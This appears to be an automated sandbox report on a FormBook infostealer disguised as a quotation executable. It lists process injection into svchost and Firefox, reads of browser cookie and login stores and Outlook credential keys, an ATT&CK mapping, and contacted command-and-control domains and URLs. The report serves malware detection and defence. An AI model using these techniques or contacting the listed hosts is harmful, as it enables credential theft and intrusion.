Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\RMActivate_ssp.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Section loaded: NULL target: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Section loaded: NULL target: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\RMActivate_ssp.exe

Thread register set: target process: 3992

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\RMActivate_ssp.exe

Thread APC queued: target process: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: B2A008

Jump to behavior

Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe

Code function: 0_2_00968C93 LogonUserW,

0_2_00968C93

Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe

Code function: 0_2_00913B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00913B4C

Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe

Code function: 0_2_00914A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_00914A35

Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe

Code function: 0_2_00974EC9 mouse_event,

0_2_00974EC9

Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PTT Group project - Quotation.exe"	Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe	Process created: C:\Windows\SysWOW64\RMActivate_ssp.exe "C:\Windows\SysWOW64\RMActivate_ssp.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe

0_2_009681F7

Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe

Code function: 0_2_00974C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00974C03

Source: PTT Group project - Quotation.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: PTT Group project - Quotation.exe, KWyVcOvVIsFTpZOKF.exe, 00000002.00000002.4088304571.0000000000D40000.00000002.00000001.00040000.00000000.sdmp, KWyVcOvVIsFTpZOKF.exe, 00000002.00000000.1682165633.0000000000D40000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: KWyVcOvVIsFTpZOKF.exe, 00000002.00000002.4088304571.0000000000D40000.00000002.00000001.00040000.00000000.sdmp, KWyVcOvVIsFTpZOKF.exe, 00000002.00000000.1682165633.0000000000D40000.00000002.00000001.00040000.00000000.sdmp, KWyVcOvVIsFTpZOKF.exe, 00000005.00000002.4088336332.0000000001270000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: KWyVcOvVIsFTpZOKF.exe, 00000002.00000002.4088304571.0000000000D40000.00000002.00000001.00040000.00000000.sdmp, KWyVcOvVIsFTpZOKF.exe, 00000002.00000000.1682165633.0000000000D40000.00000002.00000001.00040000.00000000.sdmp, KWyVcOvVIsFTpZOKF.exe, 00000005.00000002.4088336332.0000000001270000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: KWyVcOvVIsFTpZOKF.exe, 00000002.00000002.4088304571.0000000000D40000.00000002.00000001.00040000.00000000.sdmp, KWyVcOvVIsFTpZOKF.exe, 00000002.00000000.1682165633.0000000000D40000.00000002.00000001.00040000.00000000.sdmp, KWyVcOvVIsFTpZOKF.exe, 00000005.00000002.4088336332.0000000001270000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe

Code function: 0_2_0093886B cpuid

0_2_0093886B

Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe

Code function: 0_2_009450D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_009450D7

Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe

Code function: 0_2_00952230 GetUserNameW,

0_2_00952230

Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe

Code function: 0_2_0094418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_0094418A

Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe

Code function: 0_2_00914AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00914AFE

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4088478825.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4087484758.00000000029A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1762561300.0000000000EE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4088367341.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1762331518.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4090192746.0000000005020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4088706556.00000000024B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1764648995.0000000003B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\RMActivate_ssp.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: PTT Group project - Quotation.exe	Binary or memory string: WIN_81
Source: PTT Group project - Quotation.exe	Binary or memory string: WIN_XP
Source: PTT Group project - Quotation.exe	Binary or memory string: WIN_XPe
Source: PTT Group project - Quotation.exe	Binary or memory string: WIN_VISTA
Source: PTT Group project - Quotation.exe	Binary or memory string: WIN_7
Source: PTT Group project - Quotation.exe	Binary or memory string: WIN_8
Source: PTT Group project - Quotation.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4088478825.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4087484758.00000000029A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1762561300.0000000000EE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4088367341.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1762331518.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4090192746.0000000005020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4088706556.00000000024B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1764648995.0000000003B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Code function: 0_2_00986596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		0_2_00986596
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Code function: 0_2_00986A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_00986A5A

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	2 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	3 Obfuscated Files or Information	NTDS	116 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	151 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	412 Process Injection	2 Valid Accounts	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	412 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
PTT Group project - Quotation.exe	37%	ReversingLabs	Win32.Trojan.Strab
PTT Group project - Quotation.exe	34%	Virustotal		Browse
PTT Group project - Quotation.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Link
ytw6.top	1%	Virustotal	Browse
www.hsck520.com	5%	Virustotal	Browse
www.binpvae.lol	1%	Virustotal	Browse
www.lexiecos.top	1%	Virustotal	Browse
www.augaqfp.lol	1%	Virustotal	Browse
www.mhtnvro.lol	1%	Virustotal	Browse
www.webuyfontana.com	0%	Virustotal	Browse
www.ytw6.top	1%	Virustotal	Browse
www.caroinapottery.com	1%	Virustotal	Browse
www.778981.com	11%	Virustotal	Browse
www.mebutnotme.store	0%	Virustotal	Browse
www.jjkelker.com	1%	Virustotal	Browse
www.a9jcpf.top	0%	Virustotal	Browse
www.byteffederal.com	4%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js	0%	Avira URL Cloud	safe
https://cdn.livechatinc.com/tracking.js	0%	Avira URL Cloud	safe
http://www.binpvae.lol/kfqo/?9TND4h=NiOdQOuMLD2zHgMWwKws4JzuutDmLpx3tWxYTf2s7ZGupi3Uz5m5Dts89dE7D44P7JMDqAvEJ+8u+Llyo4b9pPx+fjdmUm+qFImntH+EZRPwIZM2dcS4AHM=&MXOD=nDFLlbM87h	100%	Avira URL Cloud	malware
https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark	0%	Avira URL Cloud	safe
http://www.a9jcpf.top/1kbe/	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js	0%	Avira URL Cloud	safe
https://cdn.livechatinc.com/tracking.js	0%	Virustotal		Browse
https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js	0%	Virustotal		Browse
https://duckduckgo.com/ac/?q=	0%	Virustotal		Browse
http://www.ytw6.top/rmef/?9TND4h=UdI5Nug9LeCq3QKyZxAFTuhDHYNaCA3T0/tR5L8b4jWaA2fUCVH3fLw1ebDEBIsiTWaLxfrgjTz4bD/84RJrNmZZ6yqPN++//ptV/K/4BOxQ2TPEoKO+wL0=&MXOD=nDFLlbM87h	0%	Avira URL Cloud	safe
https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js	0%	Virustotal		Browse
http://www.lexiecos.top/ff8d/	0%	Avira URL Cloud	safe
https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark	0%	Virustotal		Browse
http://www.webuyfontana.com/cns4/	0%	Avira URL Cloud	safe
https://track.uc.cn/collect	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Virustotal		Browse
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
http://www.a9jcpf.top/1kbe/	0%	Virustotal		Browse
http://www.lexiecos.top/ff8d/	1%	Virustotal		Browse
http://www.binpvae.lol/kfqo/	100%	Avira URL Cloud	malware
http://www.webuyfontana.com/cns4/?MXOD=nDFLlbM87h&9TND4h=b+X9HsydX2EZhoFbHWDGWLn8qSDjJiBvgg2FVhcLABkhzzs0ucmBPDMRqtKe3XUMFDw5FS9Ji9Imkcb4M+SgV1CrLIKWT8R/LC2e+AlJEb/hHwO3uGNSJEs=	0%	Avira URL Cloud	safe
http://www.hsck520.com/2e2r/	0%	Avira URL Cloud	safe
https://track.uc.cn/collect	0%	Virustotal		Browse
http://www.webuyfontana.com/cns4/	0%	Virustotal		Browse
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Virustotal		Browse
http://www.ytw6.top/rmef/	0%	Avira URL Cloud	safe
http://www.mhtnvro.lol/il19/	0%	Avira URL Cloud	safe
http://www.binpvae.lol/kfqo/	6%	Virustotal		Browse
https://v-cn.vaptcha.com/v3.js	0%	Avira URL Cloud	safe
https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js	0%	Avira URL Cloud	safe
http://www.lexiecos.top/ff8d/?MXOD=nDFLlbM87h&9TND4h=ohJD03igrpR8lwlwc1M4EqZrzingiHicFb+y4T5GGfrPyp+0FgUaOIwicDYxE9IqyQjr9lfiRuNbkNF7eyT6Zergy2OfkJkLywWhdn0W3d/t29Aith2p64g=	0%	Avira URL Cloud	safe
http://www.hsck520.com/2e2r/	8%	Virustotal		Browse
http://www.ytw6.top/rmef/	1%	Virustotal		Browse
https://hm.baidu.com/hm.js?	0%	Avira URL Cloud	safe
http://www.mhtnvro.lol/il19/?9TND4h=2W0Inf+zka60rkge6x3gGQQeo1iuz6hi+bPXuzv4I1vHSGtqZzoorLZZnoCmwyX2i4rMR0gWWwZYBzao7rAttPu5367SyozTICrQ88OWOZt9joXCP1iWm4I=&MXOD=nDFLlbM87h	0%	Avira URL Cloud	safe
http://www.mhtnvro.lol/il19/	1%	Virustotal		Browse
https://v-cn.vaptcha.com/v3.js	0%	Virustotal		Browse
https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js	0%	Avira URL Cloud	safe
http://www.hsck520.com	0%	Avira URL Cloud	safe
https://www.livechat.com/chat-with/14282961/	0%	Avira URL Cloud	safe
https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js	0%	Virustotal		Browse
https://www.livechat.com/?welcome	0%	Avira URL Cloud	safe
https://hm.baidu.com/hm.js?	0%	Virustotal		Browse
http://www.778981.com/p1dd/?MXOD=nDFLlbM87h&9TND4h=G7DDmCfNGXy3uJCEgcIIU1iXFvarFYWbvsRS9sxoYaNScQyM2A1goKEbo8KV9mX8trrejs5AH6YGa7AwDEXag2zD7gw0a+PZJfygUURv+5LCwJWR5NAeUOI=	100%	Avira URL Cloud	malware
http://www.hsck520.com	5%	Virustotal		Browse
https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css	0%	Avira URL Cloud	safe
http://www.augaqfp.lol/l8a4/	0%	Avira URL Cloud	safe
http://www.augaqfp.lol/l8a4/?9TND4h=CPL7YN3vcnDyuUFtA6pv3uMhLFbLrJb1JE9LZisFmiEQ0vYrwOGtj9QBvlTfLzXcbjIACE/TYt0vO88JJ7+OI7LCsTQn12dDmlA0tsWVEcE74AqN9n1fFjE=&MXOD=nDFLlbM87h	0%	Avira URL Cloud	safe
https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js	0%	Virustotal		Browse
https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css	0%	Virustotal		Browse
http://www.augaqfp.lol/l8a4/	1%	Virustotal		Browse
https://www.livechat.com/chat-with/14282961/	0%	Virustotal		Browse
https://www.livechat.com/?welcome	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ytw6.top	38.47.232.224	true	true	1%, Virustotal, Browse	unknown
aj.ajunsdfancsda.com	147.92.36.231	true	true		unknown
www.hsck520.com	35.190.52.58	true	false	5%, Virustotal, Browse	unknown
www.binpvae.lol	116.213.43.190	true	true	1%, Virustotal, Browse	unknown
www.lexiecos.top	203.161.55.102	true	true	1%, Virustotal, Browse	unknown
www.augaqfp.lol	116.213.43.190	true	true	1%, Virustotal, Browse	unknown
www.mhtnvro.lol	116.213.43.190	true	true	1%, Virustotal, Browse	unknown
7a4ca695fd164z.greycdn.net	165.154.0.120	true	true		unknown
www.webuyfontana.com	13.248.169.48	true	true	0%, Virustotal, Browse	unknown
www.778981.com	unknown	unknown	true	11%, Virustotal, Browse	unknown
www.byteffederal.com	unknown	unknown	true	4%, Virustotal, Browse	unknown
www.jjkelker.com	unknown	unknown	true	1%, Virustotal, Browse	unknown
www.ytw6.top	unknown	unknown	true	1%, Virustotal, Browse	unknown
www.caroinapottery.com	unknown	unknown	true	1%, Virustotal, Browse	unknown
www.a9jcpf.top	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.mebutnotme.store	unknown	unknown	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.binpvae.lol/kfqo/?9TND4h=NiOdQOuMLD2zHgMWwKws4JzuutDmLpx3tWxYTf2s7ZGupi3Uz5m5Dts89dE7D44P7JMDqAvEJ+8u+Llyo4b9pPx+fjdmUm+qFImntH+EZRPwIZM2dcS4AHM=&MXOD=nDFLlbM87h	true	Avira URL Cloud: malware	unknown
http://www.a9jcpf.top/1kbe/	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.ytw6.top/rmef/?9TND4h=UdI5Nug9LeCq3QKyZxAFTuhDHYNaCA3T0/tR5L8b4jWaA2fUCVH3fLw1ebDEBIsiTWaLxfrgjTz4bD/84RJrNmZZ6yqPN++//ptV/K/4BOxQ2TPEoKO+wL0=&MXOD=nDFLlbM87h	true	Avira URL Cloud: safe	unknown
http://www.lexiecos.top/ff8d/	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.webuyfontana.com/cns4/	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.binpvae.lol/kfqo/	true	6%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.webuyfontana.com/cns4/?MXOD=nDFLlbM87h&9TND4h=b+X9HsydX2EZhoFbHWDGWLn8qSDjJiBvgg2FVhcLABkhzzs0ucmBPDMRqtKe3XUMFDw5FS9Ji9Imkcb4M+SgV1CrLIKWT8R/LC2e+AlJEb/hHwO3uGNSJEs=	true	Avira URL Cloud: safe	unknown
http://www.hsck520.com/2e2r/	false	8%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.ytw6.top/rmef/	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.mhtnvro.lol/il19/	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.lexiecos.top/ff8d/?MXOD=nDFLlbM87h&9TND4h=ohJD03igrpR8lwlwc1M4EqZrzingiHicFb+y4T5GGfrPyp+0FgUaOIwicDYxE9IqyQjr9lfiRuNbkNF7eyT6Zergy2OfkJkLywWhdn0W3d/t29Aith2p64g=	true	Avira URL Cloud: safe	unknown
http://www.mhtnvro.lol/il19/?9TND4h=2W0Inf+zka60rkge6x3gGQQeo1iuz6hi+bPXuzv4I1vHSGtqZzoorLZZnoCmwyX2i4rMR0gWWwZYBzao7rAttPu5367SyozTICrQ88OWOZt9joXCP1iWm4I=&MXOD=nDFLlbM87h	true	Avira URL Cloud: safe	unknown
http://www.778981.com/p1dd/?MXOD=nDFLlbM87h&9TND4h=G7DDmCfNGXy3uJCEgcIIU1iXFvarFYWbvsRS9sxoYaNScQyM2A1goKEbo8KV9mX8trrejs5AH6YGa7AwDEXag2zD7gw0a+PZJfygUURv+5LCwJWR5NAeUOI=	true	Avira URL Cloud: malware	unknown
http://www.augaqfp.lol/l8a4/	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.augaqfp.lol/l8a4/?9TND4h=CPL7YN3vcnDyuUFtA6pv3uMhLFbLrJb1JE9LZisFmiEQ0vYrwOGtj9QBvlTfLzXcbjIACE/TYt0vO88JJ7+OI7LCsTQn12dDmlA0tsWVEcE74AqN9n1fFjE=&MXOD=nDFLlbM87h	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://cdn.livechatinc.com/tracking.js	firefox.exe, 00000008.00000002.2051321397.0000000012694000.00000004.80000000.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/chrome_newtab	RMActivate_ssp.exe, 00000003.00000002.4090822885.0000000007DFE000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark	RMActivate_ssp.exe, 00000003.00000002.4089116810.0000000004E9A000.00000004.10000000.00040000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4090730497.00000000063B0000.00000004.00000800.00020000.00000000.sdmp, KWyVcOvVIsFTpZOKF.exe, 00000005.00000002.4088627058.000000000411A000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js	RMActivate_ssp.exe, 00000003.00000002.4089116810.0000000004E9A000.00000004.10000000.00040000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4090730497.00000000063B0000.00000004.00000800.00020000.00000000.sdmp, KWyVcOvVIsFTpZOKF.exe, 00000005.00000002.4088627058.000000000411A000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	RMActivate_ssp.exe, 00000003.00000002.4090822885.0000000007DFE000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js	RMActivate_ssp.exe, 00000003.00000002.4089116810.0000000004E9A000.00000004.10000000.00040000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4090730497.00000000063B0000.00000004.00000800.00020000.00000000.sdmp, KWyVcOvVIsFTpZOKF.exe, 00000005.00000002.4088627058.000000000411A000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://track.uc.cn/collect	RMActivate_ssp.exe, 00000003.00000002.4089116810.0000000004E9A000.00000004.10000000.00040000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4090730497.00000000063B0000.00000004.00000800.00020000.00000000.sdmp, KWyVcOvVIsFTpZOKF.exe, 00000005.00000002.4088627058.000000000411A000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	RMActivate_ssp.exe, 00000003.00000002.4090822885.0000000007DFE000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
